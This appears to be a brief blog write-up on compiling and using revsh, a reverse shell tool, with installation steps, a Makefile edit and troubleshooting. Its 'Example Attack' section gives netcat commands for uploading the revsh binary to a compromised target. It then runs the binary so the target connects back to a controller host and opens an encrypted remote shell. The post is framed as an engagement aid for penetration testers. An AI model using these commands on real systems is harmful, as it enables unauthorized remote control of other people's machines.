New Awesome Tool [REVSH]

Took a couple hours to figure out this tool and wrote a little write-up on the issues I found, how I solved them, and an example engagement. Props to @emptymonkey on Twitter for the tool! https://github.com/emptymonkey/revsh.git

 

Installation


sudo apt-get install openssl libssl-dev # Pre-req for building.
git clone https://github.com/emptymonkey/revsh.git
cd revsh
nano config.h # (OPTIONAL) Set up new defaults that fit your situation.

Editing the Makefile

nano Makefile # Edit the Makefile so it looks like this:
————————————-
## Linux
CFLAGS = -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL
LIBS = -lssl -lcrypto
KEYS_DIR = keys
KEY_OF_C = in_the_key_of_c
IO_DEP = io_ssl.c
## Linux w/static libraries.
#CFLAGS = -static -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL
#LIBS = -lssl -lcrypto -ldl -lz
#KEYS_DIR = keys
#KEY_OF_C = in_the_key_of_c
#IO_DEP = io_ssl.c
————————————-

Finishing Up

mkdir -p /usr/local/share/man/man1 2>/dev/null # Weird problem I ran into
make # This *can* take a very long time, though it usually doesn’t.
make install
cd ~/.revsh
nano rc # (OPTIONAL) Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h # READY TO GO
Example Attack

Now to attack!
Once you get a shell, send the revsh binary with these commands:
Target:
nc -lvp <port> > revsh
Controller:
nc -w 3 <ip> <port> < revsh
Once uploaded, run these commands:
Controller:
revsh -c -vvv <ip>:<port>
Target:
chmod +x revsh
./revsh <ip>:<port>
 
Troubleshooting

A fingerprint mismatch means you did not use the same compiled binary on both sides. In that case, you need to run with the ‘-a’ flag.

 
